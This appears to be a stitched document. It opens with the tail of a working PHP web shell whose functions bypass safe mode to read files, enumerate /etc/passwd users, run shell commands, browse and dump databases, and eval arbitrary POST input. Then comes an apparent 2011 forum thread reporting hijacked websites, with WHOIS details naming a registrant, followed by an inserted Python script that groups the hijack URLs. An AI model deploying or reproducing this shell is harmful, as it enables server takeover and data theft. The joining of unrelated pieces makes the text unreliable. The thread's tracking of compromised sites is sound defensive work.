<input type=submit value=">>"></form>';
break;
}
echo '</div>';
XFooter();
}

function actionSafeMode(){
$temp='';
ob_start();
switch($_POST['p1']){
case 1:
$temp=@tempnam($test,'cx');
if(@copy("compress.zlib://".$_POST['p2'],$temp)){
echo @file_get_contents($temp);
unlink($temp);
}else
echo 'Sorry... Can\'t open file';
break;
case 2:
$files=glob($_POST['p2'].'*');
if(is_array($files))
foreach ($files as $filename)
echo $filename."\n";
break;
case 3:
$ch=curl_init("file://".$_POST['p2']."\x00".preg_replace('!\(\d+\)\s.*!','',__FILE__));
curl_exec($ch);
break;
case 4:
ini_restore("safe_mode");
ini_restore("open_basedir");
include($_POST['p2']);
break;
case 5:
for(;$_POST['p2'] <= $_POST['p3'];$_POST['p2']++){
$uid=@posix_getpwuid($_POST['p2']);
if($uid)
echo join(':',$uid)."\n";
}
break;
}
$temp=ob_get_clean();
XHeader();
echo '<h1>Safe mode bypass</h1><div class=content>';
echo '<span>Copy (read file)</span><form onsubmit=\'g(null,null,"1",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Glob (list dir)</span><form onsubmit=\'g(null,null,"2",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Curl (read file)</span><form onsubmit=\'g(null,null,"3",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Ini_restore (read file)</span><form onsubmit=\'g(null,null,"4",this.param.value);return false;\'>
<input type=text name=param><input type=submit value=">>">
</form><br><span>Posix_getpwuid ("Read" /etc/passwd)
</span><table><form onsubmit=\'g(null,null,"5",this.param1.value,this.param2.value);return false;\'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr>
<tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table>
<input type=submit value=">>"></form>';
if($temp)
echo '<pre class="ml1" style="margin-top:5px" id="Output">'.htmlspecialchars($temp).'</pre>';
echo '</div>';
XFooter();
}

function actionConsole(){
if(!empty($_POST['p1'])&&!empty($_POST['p2'])){
$_SESSION[md5($_SERVER['HTTP_HOST']).'stderr_to_out']=true;
$_POST['p1'] .= ' 2>&1';
}elseif(!empty($_POST['p1']))
$_SESSION[md5($_SERVER['HTTP_HOST']).'stderr_to_out']=false;

if(isset($_POST['ajax'])){
$_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']=true;
ob_start();
echo "d.cf.cmd.value='';\n";
$temp=@iconv($_POST['charset'],'UTF-8',addcslashes("\n$ ".$_POST['p1']."\n".XEx($_POST['p1']),"\n\r\t\\'\0"));
if(preg_match("!.*cd\s+([^;]+)$!",$_POST['p1'],$match)){
if(@chdir($match[1])){
$GLOBALS['cwd']=@getcwd();
echo "c_='".$GLOBALS['cwd']."';";
}
}
echo "d.cf.output.value+='".$temp."';";
echo "d.cf.output.scrollTop=d.cf.output.scrollHeight;";
$temp=ob_get_clean();
echo strlen($temp),"\n",$temp;
exit;
}
XHeader();
echo "<script>
if(window.Event) window.captureEvents(Event.KEYDOWN);
var cmds=new Array('');
var cur=0;
function kp(e){
var n=(window.Event)?e.which:e.keyCode;
if(n==38){
cur--;
if(cur>=0)
document.cf.cmd.value=cmds[cur];
else
cur++;
}else if(n==40){
cur++;
if(cur < cmds.length)
document.cf.cmd.value=cmds[cur];
else
cur--;
}
}
function add(cmd){
cmds.pop();
cmds.push(cmd);
cmds.push('');
cur=cmds.length-1;
}
</script>";
echo '<h1>Console</h1><div class=content><form name=cf onsubmit="if(d.cf.cmd.value==\'clear\'){d.cf.output.value=\'\';d.cf.cmd.value=\'\';return false;}add(this.cmd.value);if(this.ajax.checked){a(null,null,this.cmd.value,this.show_errors.checked?1:\'\');}else{g(null,null,this.cmd.value,this.show_errors.checked?1:\'\');}return false;"><select name=alias>';
foreach($GLOBALS['aliases'] as $n=>$v){
if($v==''){
echo '<optgroup label="-'.htmlspecialchars($n).'-"></optgroup>';
continue;
}
echo '<option value="'.htmlspecialchars($v).'">'.$n.'</option>';
}
if(empty($_POST['ajax'])&&!empty($_POST['p1']))
$_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']=false;
echo '</select><input type=button onclick="add(d.cf.alias.value);if(d.cf.ajax.checked){a(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\'\');}else{g(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\'\');}" value=">>"> <nobr><input type=checkbox name=ajax value=1 '.(@$_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX <input type=checkbox name=show_errors value=1 '.(!empty($_POST['p2'])||$_SESSION[md5($_SERVER['HTTP_HOST']).'stderr_to_out']?'checked':'').'> redirect stderr to stdout (2>&1)</nobr><br/><textarea class=bigarea name=output style="border-bottom:0;margin:0;" readonly>';
if(!empty($_POST['p1'])){
echo htmlspecialchars("$ ".$_POST['p1']."\n".XEx($_POST['p1']));
}
echo '</textarea><table style="border:1px solid #df5;background-color:#555;border-top:0px;"
cellpadding=0 cellspacing=0 width="100%"><tr><td width="1%">$</td><td><input type=text name=cmd
style="border:0px;width:100%;" onkeydown="kp(event);"></td></tr></table>';
echo '</form></div><script>d.cf.cmd.focus();</script>';
XFooter();
}

function actionLogout(){
session_destroy();
die('bye!');
}

function actionSelfRemove(){

if($_POST['p1']=='yes')
if(@unlink(preg_replace('!\(\d+\)\s.*!','',__FILE__)))
die('Shell has been removed');
else
echo 'unlink error!';
if($_POST['p1']!='yes')
XHeader();
echo '<h1>Suicide</h1><div class=content>Really want to remove the shell?<br><a href=# onclick="g(null,null,\'yes\')">Yes</a></div>';
XFooter();
}

function actionSql(){
class DbClass {
var $type;
var $link;
var $res;
function DbClass($type){
$this->type=$type;
}
function connect($host,$user,$pass,$dbname){
switch($this->type){
case 'mysql':
if($this->link=@mysql_connect($host,$user,$pass,true)) return true;
break;
case 'pgsql':
$host=explode(':',$host);
if(!$host[1]) $host[1]=5432;
if($this->link=@pg_connect("host={$host[0]}port={$host[1]}user=$user password=$pass dbname=$dbname")) return true;
break;
}
return false;
}
function selectdb($db){
switch($this->type){
case 'mysql':
if(@mysql_select_db($db))return true;
break;
}
return false;
}
function query($str){
switch($this->type){
case 'mysql':
return $this->res=@mysql_query($str);
break;
case 'pgsql':
return $this->res=@pg_query($this->link,$str);
break;
}
return false;
}
function fetch(){
$res=func_num_args()?func_get_arg(0):$this->res;
switch($this->type){
case 'mysql':
return @mysql_fetch_assoc($res);
break;
case 'pgsql':
return @pg_fetch_assoc($res);
break;
}
return false;
}
function listDbs(){
switch($this->type){
case 'mysql':
return $this->query("SHOW databases");
break;
case 'pgsql':
return $this->res=$this->query("SELECT datname FROM pg_database WHERE datistemplate!='t'");
break;
}
return false;
}
function listTables(){
switch($this->type){
case 'mysql':
return $this->res=$this->query('SHOW TABLES');
break;
case 'pgsql':
return $this->res=$this->query("select table_name from information_schema.tables where table_schema!='information_schema' AND table_schema!='pg_catalog'");
break;
}
return false;
}
function error(){
switch($this->type){
case 'mysql':
return @mysql_error();
break;
case 'pgsql':
return @pg_last_error();
break;
}
return false;
}
function setCharset($str){
switch($this->type){
case 'mysql':
if(function_exists('mysql_set_charset'))
return @mysql_set_charset($str,$this->link);
else
$this->query('SET CHARSET '.$str);
break;
case 'pgsql':
return @pg_set_client_encoding($this->link,$str);
break;
}
return false;
}
function loadFile($str){
switch($this->type){
case 'mysql':
return $this->fetch($this->query("SELECT LOAD_FILE('".addslashes($str)."') as file"));
break;
case 'pgsql':
$this->query("CREATE TABLE X2(file text);COPY X2 FROM '".addslashes($str)."';select file from X2;");
$r=array();
while($i=$this->fetch())
$r[]=$i['file'];
$this->query('drop table X2');
return array('file'=>implode("\n",$r));
break;
}
return false;
}
function dump($table,$fp=false){
switch($this->type){
case 'mysql':
$res=$this->query('SHOW CREATE TABLE `'.$table.'`');
$create=mysql_fetch_array($res);
$sql=$create[1].";\n";
if($fp) fwrite($fp,$sql); else echo($sql);
$this->query('SELECT * FROM `'.$table.'`');
$head=true;
while($item=$this->fetch()){
$columns=array();
foreach($item as $k=>$v){
if($v==null)
$item[$k]="NULL";
elseif(is_numeric($v))
$item[$k]=$v;
else
$item[$k]="'".@mysql_real_escape_string($v)."'";
$columns[]="`".$k."`";
}
if($head){
$sql='INSERT INTO `'.$table.'` ('.implode(",",$columns).") VALUES \n\t(".implode(",",$item).')';
$head=false;
}else
$sql="\n\t,(".implode(",",$item).')';
if($fp) fwrite($fp,$sql); else echo($sql);
}
if(!$head)
if($fp) fwrite($fp,";\n\n"); else echo(";\n\n");
break;
case 'pgsql':
$this->query('SELECT * FROM '.$table);
while($item=$this->fetch()){
$columns=array();
foreach($item as $k=>$v){
$item[$k]="'".addslashes($v)."'";
$columns[]=$k;
}
$sql='INSERT INTO '.$table.' ('.implode(",",$columns).') VALUES ('.implode(",",$item).');'."\n";
if($fp) fwrite($fp,$sql); else echo($sql);
}
break;
}
return false;
}
};
$db=new DbClass($_POST['type']);
if(@$_POST['p2']=='download'){
$db->connect($_POST['sql_host'],$_POST['sql_login'],$_POST['sql_pass'],$_POST['sql_base']);
$db->selectdb($_POST['sql_base']);
switch($_POST['charset']){
case "Windows-1251": $db->setCharset('cp1251'); break;
case "UTF-8": $db->setCharset('utf8'); break;
case "KOI8-R": $db->setCharset('koi8r'); break;
case "KOI8-U": $db->setCharset('koi8u'); break;
case "cp866": $db->setCharset('cp866'); break;
}
if(empty($_POST['file'])){
ob_start("ob_gzhandler",4096);
header("Content-Disposition: attachment; filename=dump.sql");
header("Content-Type: text/plain");
foreach($_POST['tbl'] as $v)
$db->dump($v);
exit;
}elseif($fp=@fopen($_POST['file'],'w')){
foreach($_POST['tbl'] as $v)
$db->dump($v,$fp);
fclose($fp);
unset($_POST['p2']);
}else
die('<script>alert("Error! Can\'t open file");window.history.back(-1)</script>');
}
XHeader();
echo "
<h1>Sql browser</h1><div class=content>
<form name='sf' method='post' onsubmit='fs(this);'><table cellpadding='2' cellspacing='0'><tr>
<td>Type</td><td>Host</td><td>Login</td><td>Password</td><td>Database</td><td></td></tr><tr>
<input type=hidden name=a value=Sql><input type=hidden name=p1 value='query'><input type=hidden name=p2 value=''><input type=hidden name=c value='". htmlspecialchars($GLOBALS['cwd']) ."'><input type=hidden name=charset value='". (isset($_POST['charset'])?$_POST['charset']:'') ."'>
<td><select name='type'><option value='mysql' ";
if(@$_POST['type']=='mysql')echo 'selected';
echo ">MySql</option><option value='pgsql' ";
if(@$_POST['type']=='pgsql')echo 'selected';
echo ">PostgreSql</option></select></td>
<td><input type=text name=sql_host value='". (empty($_POST['sql_host'])?'localhost':htmlspecialchars($_POST['sql_host'])) ."'></td>
<td><input type=text name=sql_login value='". (empty($_POST['sql_login'])?'root':htmlspecialchars($_POST['sql_login'])) ."'></td>
<td><input type=text name=sql_pass value='". (empty($_POST['sql_pass'])?'':htmlspecialchars($_POST['sql_pass'])) ."'></td><td>";
$tmp="<input type=text name=sql_base value=''>";
if(isset($_POST['sql_host'])){
if($db->connect($_POST['sql_host'],$_POST['sql_login'],$_POST['sql_pass'],$_POST['sql_base'])){
switch($_POST['charset']){
case "Windows-1251": $db->setCharset('cp1251'); break;
case "UTF-8": $db->setCharset('utf8'); break;
case "KOI8-R": $db->setCharset('koi8r'); break;
case "KOI8-U": $db->setCharset('koi8u'); break;
case "cp866": $db->setCharset('cp866'); break;
}
$db->listDbs();
echo "<select name=sql_base><option value=''></option>";
while($item=$db->fetch()){
list($key,$value)=each($item);
echo '<option value="'.$value.'" '.($value==$_POST['sql_base']?'selected':'').'>'.$value.'</option>';
}
echo '</select>';
}
else echo $tmp;
}else
echo $tmp;
echo "</td>
<td><input type=submit value='>>' onclick='fs(d.sf);'></td>
<td><input type=checkbox name=sql_count value='on'".(empty($_POST['sql_count'])?'':' checked').">
count the number of rows</td>
</tr>
</table>
<script>
s_db='".@addslashes($_POST['sql_base'])."';
function fs(f){
if(f.sql_base.value!=s_db){ f.onsubmit=function(){};
if(f.p1) f.p1.value='';
if(f.p2) f.p2.value='';
if(f.p3) f.p3.value='';
}
}
function st(t,l){
d.sf.p1.value='select';
d.sf.p2.value=t;
if(l&&d.sf.p3) d.sf.p3.value=l;
d.sf.submit();
}
function is(){
for(i=0;i<d.sf.elements['tbl[]'].length;++i)
d.sf.elements['tbl[]'][i].checked=!d.sf.elements['tbl[]'][i].checked;
}
</script>";
if(isset($db)&&$db->link){
echo "<br/><table width=100% cellpadding=2 cellspacing=0>";
if(!empty($_POST['sql_base'])){
$db->selectdb($_POST['sql_base']);
echo "<tr><td width=1 style='border-top:2px solid #666;'><span>Tables:</span><br><br>";
$tbls_res=$db->listTables();
while($item=$db->fetch($tbls_res)){
list($key,$value)=each($item);
if(!empty($_POST['sql_count']))
$n=$db->fetch($db->query('SELECT COUNT(*) as n FROM '.$value.''));
$value=htmlspecialchars($value);
echo "<nobr><input type='checkbox' name='tbl[]' value='".$value."'>&nbsp;<a href=# onclick=\"st('".$value."',1)\">".$value."</a>".(empty($_POST['sql_count'])?'&nbsp;':" <small>({$n['n']})</small>")."</nobr><br>";
}
echo "<input type='checkbox' onclick='is();'> <input type=button value='Dump' onclick='document.sf.p2.value=\"download\";document.sf.submit();'><br>File path:<input type=text name=file value='dump.sql'></td><td style='border-top:2px solid #666;'>";
if(@$_POST['p1']=='select'){
$_POST['p1']='query';
$_POST['p3']=$_POST['p3']?$_POST['p3']:1;
$db->query('SELECT COUNT(*) as n FROM '.$_POST['p2']);
$num=$db->fetch();
$pages=ceil($num['n'] / 30);
echo "<script>d.sf.onsubmit=function(){st(\"".$_POST['p2']."\",d.sf.p3.value)}</script><span>".$_POST['p2']."</span> ({$num['n']}records) Page # <input type=text name='p3' value=".((int)$_POST['p3']).">";
echo " of $pages";
if($_POST['p3'] > 1)
echo " <a href=# onclick='st(\"".$_POST['p2'].'",'.($_POST['p3']-1).")'>&lt; Prev</a>";
if($_POST['p3'] < $pages)
echo " <a href=# onclick='st(\"".$_POST['p2'].'",'.($_POST['p3']+1).")'>Next &gt;</a>";
$_POST['p3']--;
if($_POST['type']=='pgsql')
$_POST['p2']='SELECT * FROM '.$_POST['p2'].' LIMIT 30 OFFSET '.($_POST['p3']*30);
else
$_POST['p2']='SELECT * FROM `'.$_POST['p2'].'` LIMIT '.($_POST['p3']*30).',30';
echo "<br><br>";
}
if((@$_POST['p1']=='query')&&!empty($_POST['p2'])){
$db->query(@$_POST['p2']);
if($db->res!==false){
$title=false;
echo '<table width=100% cellspacing=1 cellpadding=2 class=main style="background-color:#292929">';
$line=1;
while($item=$db->fetch()){
if(!$title){
echo '<tr>';
foreach($item as $key=>$value)
echo '<th>'.$key.'</th>';
reset($item);
$title=true;
echo '</tr><tr>';
$line=2;
}
echo '<tr class="l'.$line.'">';
$line=$line==1?2:1;
foreach($item as $key=>$value){
if($value==null)
echo '<td><i>null</i></td>';
else
echo '<td>'.nl2br(htmlspecialchars($value)).'</td>';
}
echo '</tr>';
}
echo '</table>';
}else {
echo '<div><b>Error:</b> '.htmlspecialchars($db->error()).'</div>';
}
}
echo "<br></form><form onsubmit='d.sf.p1.value=\"query\";d.sf.p2.value=this.query.value;document.sf.submit();
return false;'><textarea name='query' style='width:100%;height:100px'>";
if(!empty($_POST['p2'])&&($_POST['p1']!='loadfile'))
echo htmlspecialchars($_POST['p2']);
echo "</textarea><br/><input type=submit value='Execute'>";
echo "</td></tr>";
}
echo "</table></form><br/>";
if($_POST['type']=='mysql'){
$db->query("SELECT 1 FROM mysql.user WHERE concat(`user`,'@',`host`)=USER() AND `File_priv`='y'");
if($db->fetch())
echo "<form onsubmit='d.sf.p1.value=\"loadfile\";document.sf.p2.value=this.f.value;
document.sf.submit();return false;'>
<span>Load file</span> <inputclass='toolsInp' type=text name=f><input type=submit value='>>'>
</form>";
}
if(@$_POST['p1']=='loadfile'){
$file=$db->loadFile($_POST['p2']);
echo '<pre class=ml1>'.htmlspecialchars($file['file']).'</pre>';
}
}else {
echo htmlspecialchars($db->error());
}
echo '</div>';
XFooter();
}
function actionRC(){
if(!@$_POST['p1']){
$a=array(
"uname"=>php_uname(),
"php_version"=>phpversion(),
"X_version"=>X_VERSION,
"safemode"=>@ini_get('safe_mode')
);
echo serialize($a);
}else {
eval($_POST['p1']);
}
}
if(empty($_POST['a']))if(isset($default_action)&&function_exists('action'.$default_action))
$_POST['a']=$default_action;else$_POST['a']='SecInfo';
if(!empty($_POST['a'])&&function_exists('action'.$_POST['a']))
call_user_func('action'.$_POST['a']);exit;
?>
Amouse
Spam Reporter

zsp2.neostrada.pl

Postby Red Dwarf » Sun Jan 16, 2011 4:28 pm

zsp2.neostrada.pl is a hijacked site with the following sample redirections
http://zsp2.neostrada.pl/dawh.html
http://zsp2.neostrada.pl/epbli.html
http://zsp2.neostrada.pl/njhnjn.html
http://zsp2.neostrada.pl/oaowm.html
http://zsp2.neostrada.pl/obhlz.html
http://zsp2.neostrada.pl/owccl.html
http://zsp2.neostrada.pl/qpl.html
http://zsp2.neostrada.pl/qqwskfgg.html
http://zsp2.neostrada.pl/ri.html
http://zsp2.neostrada.pl/s.html
http://zsp2.neostrada.pl/uf.html
http://zsp2.neostrada.pl/yv.html
http://zsp2.neostrada.pl/zjludzjn.html


Redirection targets include
buy-softwareshop.ru Software piracy http://spamtrackers.eu/wiki/index.php/EuroSoft
fawdoctor.com Pharmacy fraud http://spamtrackers.eu/wiki/index.php/Pharmacy_Express
Red Dwarf
You are kiillllling-a my bizinisss!

windyplains.co.za

Postby Red Dwarf » Sun Jan 16, 2011 4:48 pm

windyplains.co.za has been hijacked. Samples:
http://www.windyplains.co.za/ccwddpyd.html
http://www.windyplains.co.za/eaa.html
http://www.windyplains.co.za/evfo.html
http://www.windyplains.co.za/ewgpwg.html
http://www.windyplains.co.za/kbmqhyxo.html
http://www.windyplains.co.za/kz.html
http://www.windyplains.co.za/nbvefw.html
http://www.windyplains.co.za/o.html
http://www.windyplains.co.za/qp.html
http://www.windyplains.co.za/rrworvko.html
http://www.windyplains.co.za/sswqnprv.html
http://www.windyplains.co.za/tp.html
http://www.windyplains.co.za/uibp.html
http://www.windyplains.co.za/uvtoyq.html
http://www.windyplains.co.za/wgyjmm.html


Redirection targets include
buy-softwareshop.ru Software piracy http://spamtrackers.eu/wiki/index.php/EuroSoft
fawdoctor.com Pharmacy fraud http://spamtrackers.eu/wiki/index.php/Pharmacy_Express

The site owner should clean off all of the hijack files, and fix the security on the web site.
Red Dwarf
You are kiillllling-a my bizinisss!

Re: Compromised hosts

Postby Amouse » Sun Jan 16, 2011 4:49 pm

Another spam run is in progress as I write and started over 9 hours ago.
The same IP address is being used.
Amouse
Spam Reporter

tarentaalrandsafari.co.za

Postby Red Dwarf » Sun Jan 16, 2011 5:02 pm

tarentaalrandsafari.co.za has been hijacked. Samples:
http://www.tarentaalrandsafari.co.za/cjntv.html
http://www.tarentaalrandsafari.co.za/dmkokl.html
http://www.tarentaalrandsafari.co.za/e.html
http://www.tarentaalrandsafari.co.za/hzlfsfqd.html
http://www.tarentaalrandsafari.co.za/jmjnaqko.html
http://www.tarentaalrandsafari.co.za/kdei.html
http://www.tarentaalrandsafari.co.za/kdtkffl.html
http://www.tarentaalrandsafari.co.za/l.html
http://www.tarentaalrandsafari.co.za/mfmtrgj.html
http://www.tarentaalrandsafari.co.za/mtxlr.html
http://www.tarentaalrandsafari.co.za/uizianc.html
http://www.tarentaalrandsafari.co.za/vizqi.html
http://www.tarentaalrandsafari.co.za/wk.html
http://www.tarentaalrandsafari.co.za/x.html
http://www.tarentaalrandsafari.co.za/xlib.html
http://www.tarentaalrandsafari.co.za/ygifcf.html
http://www.tarentaalrandsafari.co.za/ykogf.html
http://www.tarentaalrandsafari.co.za/yuserxml.html


Redirection targets include
buy-softwareshop.ru Software piracy http://spamtrackers.eu/wiki/index.php/EuroSoft
fawdoctor.com Pharmacy fraud http://spamtrackers.eu/wiki/index.php/Pharmacy_Express

The site owner should clean off all of the hijack files, and fix the security on the web site.
Red Dwarf
You are kiillllling-a my bizinisss!

Re: tarentaalrandsafari.co.za

Postby AlphaCentauri » Sun Jan 16, 2011 5:46 pm

Red Dwarf wrote: tarentaalrandsafari.co.za has been hijacked.


There's an iframe on some of the legitimate pages linking to 178.17.163.109/z/index.php -- currently not loading for me, but be careful. That website is pretty thoroughly pwned.

Unbelievably, eNom has STILL not suspended fawdoctor.com or the other Pharmacy Express domains like medicanki.com or medicamor.com receiving traffic from the multiple websites that have been illegally accessed by these spammers. There is no affiliate number in the URLs linking from the hijacked sites -- there is no indication that anyone other than the Pharmacy Express domain owner himself is responsible for the hijacking of innocent websites.

Meanwhile tarentaalrandsafari.co.za has such a bad reputation on MyWot that the thumbnail is blurred out (done as a precaution for sites that are rated that low, as they might have content like child porn images). I know eNom has been informed of the situation for nearly three weeks, maybe longer. The owners of the hijacked websites ought to have their attorneys contact eNom about its continued facilitation of the damage being done to their reputations. It seems to be the only thing the current management at eNom understands.
AlphaCentauri
You are kiillllling-a my bizinisss!

Re: Compromised hosts

Postby Amouse » Mon Jan 17, 2011 12:09 am

WordPress web sites being hacked.

hXXp://wnazura.com/wp-admin/before/breathe.html
hXXp://pv.dashway.com/wp-content/central/creature.html
hXXp://website.trigon.website.pl/_wp_generated/rabbit/bleed.html
hXXp://piko.nl/wp-content/through/lightly.html
hXXp://www.thebelltower.org/wp-content/dark/company.html
hXXp://yorkshiremasonryspecialist.co.uk/wp-includes/deny/jeans.html
hXXp://onlinefreeadds.com/wp-includes/anyway/corridor.html
hXXp://atrakcyjnestrony.pl/wp-admin/toilet/wave.html
hXXp://favorite-cafe.com/wp-content/pound/vision.html
hXXp://36organic.pl/wp-includes/studio/hire.html
hXXp://promorb.ro/wp-includes/wrong/after.html
hXXp://witkowski.ipws.pl/wp-includes/inch/sand.html
hXXp://gravyjefferson.com/wp-content/vehicle/realize.html
hXXp://rogues-racing.com/wp-includes/nearly/journey.html
hXXp://toyourbestofhealth.com/wp-admin/court/snow.html

OSCommerce web sites being hacked.
hXXp://sklep.kos-serwis.pl/logs/spirit/
hXXp://www.thaiwax.co.cc/images/ Tag Hacked by Number 7

Joomla web sites being hacked.

hXXp://www.deansart.co.nz/administrator/
hXXp://www.screensignsupplies.com/admin/includes/couple/

The above site has a Content Encoding Error, which is a known Joomla bug.
This means the following web sites can probably be assigned to the Joomla list without the need to visit every site. A simple grep gives this list.
hXXp://www.mundopiercing.com/admin/includes/weak/flag.html
hXXp://www.lecoccinelle.eu/negozio/admin/includes/wine/silk.html
hXXp://www.scubazar.com/admin/includes/depth/surely.html
hXXp://www.epocaricambi.com/admin/includes/restaurant/cost.html
hXXp://store.rockyourpets.com/admin/includes/sell/deeply.html
hXXp://www.modellmanufaktur.com/zen-cart/admin/includes/conceal/speed.html Check Joomla OK
hXXp://shop.shunsui.net/admin/includes/foot/baby.html
hXXp://www.diverservice.it/e-shop/admin/includes/policeman/alongside.html
hXXp://www.shotcrete.bz/admin/includes/effort/ground.html
hXXp://www.museobonsai.it/shop/admin/includes/summer/desk.html
hXXp://www.music-world.it/shop/admin/includes/goddamn/float.html
hXXp://www.immobiliarelogiudice.it/logiudice/admin/includes/studio/reveal.html Check Joomla OK
hXXp://www.tougei-taian.com/modules/zox/admin/includes/handsome/shut.html
hXXp://www.bomboniereninfee.it/admin/includes/stone/unlock.html

PrestaShop hXXp://www.prestashop.com/

hXXp://bassix.nl/classes/concern/


Unknown web site package
hXXp://imagejunctionsalon.com/images/  > rxpillstablets.com
hXXp://paradosiaki-foresia.gr/images/beam/
hXXp://green-energia.gr/photovoltaic/peer/
hXXp://wholesale-shoes-factory.com/pictures/range/ > greattabletscapsule.net
hXXp://sidneilino.com.br/relief/heavy/ Tag in top level Hacked by Mhiman Hnc > tabletscapsulesdrugstore.net

Special note. The above web site may be trying to drop a file on browsers' machines.
hXXp://silverdutchman.nl/Media/strong/

Extra info from Mhiman tag.

Domain Name:HACKER-NEWBIE.ORG
Created On:09-May-2009 10:30:14 UTC
Last Updated On:10-Jul-2010 00:23:49 UTC
Expiration Date:09-May-2011 10:30:14 UTC
Sponsoring Registrar:CV. Jogjacamp (R1830-LROR)
Status:CLIENT TRANSFER PROHIBITED
Registrant ID:DI_9722235
Registrant Name:Al zea arafat
Registrant Organization:belidonk.org
Registrant Street1:BTN Griya Kuningan permai
Registrant Street2:
Registrant Street3:
Registrant City:Kuningan
Registrant State/Province:Jawa Barat
Registrant Postal Code:45511
Registrant Country:ID
Registrant Phone:+62.000000
Registrant Phone Ext.:
Registrant FAX:
Registrant FAX Ext.:
Registrant Email:n4is3n@fedora.or.id

dig hXXp://www.hacker-newbie.org

; <<>> DiG 9.6-ESV-R3 <<>> hXXp://www.hacker-newbie.org
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 8739
;; flags: qr rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 2, ADDITIONAL: 0

;; QUESTION SECTION:
;www.hacker-newbie.org. IN A

;; ANSWER SECTION:
hXXp://www.hacker-newbie.org. 14400 IN CNAME hacker-newbie.org.
hacker-newbie.org. 14370 IN A 180.235.148.57

;; AUTHORITY SECTION:
hacker-newbie.org. 86370 IN NS id4.dracoola.net.
hacker-newbie.org. 86370 IN NS id3.dracoola.net.

;; Query time: 302 msec
;; SERVER: 203.114.168.2#53(203.114.168.2)
;; WHEN: Mon Jan 17 17:02:41 2011
;; MSG SIZE rcvd: 117

dig mx hacker-newbie.org

; <<>> DiG 9.6-ESV-R3 <<>> mx hacker-newbie.org
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 59894
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 2, ADDITIONAL: 0

;; QUESTION SECTION:
;hacker-newbie.org. IN MX

;; ANSWER SECTION:
hacker-newbie.org. 14400 IN MX 10 aspmx.l.google.com.

;; AUTHORITY SECTION:
hacker-newbie.org. 86400 IN NS id3.dracoola.net.
hacker-newbie.org. 86400 IN NS id4.dracoola.net.

;; Query time: 329 msec
;; SERVER: 203.114.168.2#53(203.114.168.2)
;; WHEN: Mon Jan 17 17:02:56 2011
;; MSG SIZE rcvd: 117

Choice... Another stupid hacker using google for their mail... Vinton's security team must be having a great time tracking down these scum.

inetnum: 180.235.148.0 - 180.235.151.255
netname: ARDH-ID
descr: PT. ARDH GLOBAL INDONESIA
descr: Corporate / Direct member IDNIC
descr: Komplek Ruko Golden Madrid II Blok B-23
descr: BSD-City, Tangerang, Banten 15321.
country: ID

It takes hours to check the amount of web site URLs I have and I have RSI so I just do not have the ability to check all.

When spammy is finished his current spam run I will publish a list of URLs that I have collected since I last published.
Amouse
Spam Reporter
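A triage script in the spirit of the grep described in the post above, added here as an example that is not code from the post or from any tool it names: it groups a list of collected hijack URLs by the CMS directory markers the thread uses (wp-admin, wp-content, wp-includes; administrator and admin/includes; classes) and flags the two file-name shapes that recur in the samples (a short random-letter .html at the site root, and a /word/word.html pair dropped under an existing directory). The marker-to-package mapping follows the post's own grouping and is an assumption to confirm on the server, not proof of what is installed; the sample entries are copied from the thread.

```python
"""Group collected hijack URLs by CMS path marker and file-name shape."""
import re
from collections import defaultdict
from urllib.parse import urlparse

# Directory markers taken from the paths quoted in the thread. The package
# each marker is mapped to follows the post's own grouping (an assumption to
# confirm on the server, not proof of what is installed).
CMS_MARKERS = (
    ("WordPress", re.compile(r"/wp-(?:admin|content|includes)/")),
    ("Joomla", re.compile(r"/administrator/|/admin/includes/")),
    ("PrestaShop", re.compile(r"/classes/")),
)

# Two file-name shapes that recur in the samples:
#   root_random : a short run of lowercase letters at the site root, e.g. /dawh.html
#   word_pair   : /<word>/<word>.html dropped under an existing directory,
#                 e.g. /wp-admin/before/breathe.html
ROOT_RANDOM = re.compile(r"^/[a-z]{1,8}\.html$")
WORD_PAIR = re.compile(r"^(?:/[^/]+)*/[a-z]+/[a-z]+\.html$")

# Constructed input: a handful of entries copied from the thread, including
# defanged (hXXp://) and scheme-less forms and one with a trailing note.
SAMPLE_URLS = [
    "hXXp://wnazura.com/wp-admin/before/breathe.html",
    "hXXp://www.thebelltower.org/wp-content/dark/company.html",
    "hXXp://www.deansart.co.nz/administrator/",
    "hXXp://www.mundopiercing.com/admin/includes/weak/flag.html",
    "hXXp://bassix.nl/classes/concern/",
    "hXXp://imagejunctionsalon.com/images/  > rxpillstablets.com",
    "zsp2.neostrada.pl/dawh.html",
    "http://zsp2.neostrada.pl/qpl.html",
]


def normalize(url):
    """Return (host, path) for a possibly defanged or scheme-less entry."""
    token = url.strip().split()[0]        # drop notes such as "> target"
    if "://" not in token:
        token = "http://" + token
    parsed = urlparse(token)              # "hXXp" is accepted as a scheme
    return parsed.netloc.lower(), parsed.path or "/"


def classify_url(url):
    """Classify one entry by CMS marker and hijack file-name shape."""
    host, path = normalize(url)
    cms = next((name for name, rx in CMS_MARKERS if rx.search(path)), "unknown")
    if ROOT_RANDOM.match(path):
        shape = "root_random"
    elif WORD_PAIR.match(path):
        shape = "word_pair"
    else:
        shape = "other"
    return {"host": host, "path": path, "cms": cms, "shape": shape}


def triage(urls):
    """Group hosts per CMS guess so each list can be handled as a batch."""
    groups = defaultdict(set)
    for url in urls:
        if url.strip():
            info = classify_url(url)
            groups[info["cms"]].add(info["host"])
    return {cms: sorted(hosts) for cms, hosts in groups.items()}


if __name__ == "__main__":
    for cms, hosts in sorted(triage(SAMPLE_URLS).items()):
        print(f"{cms}: {', '.join(hosts)}")
    for url in SAMPLE_URLS:
        print(classify_url(url))
```

Hosts in the "unknown" group still need a visit; the marker only saves the trip for sites whose paths already name the package.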

Re: Compromised hosts

Postby Amouse » Mon Jan 17, 2011 3:54 am

I think this one warrants being investigated by the Dept of Homeland Security.

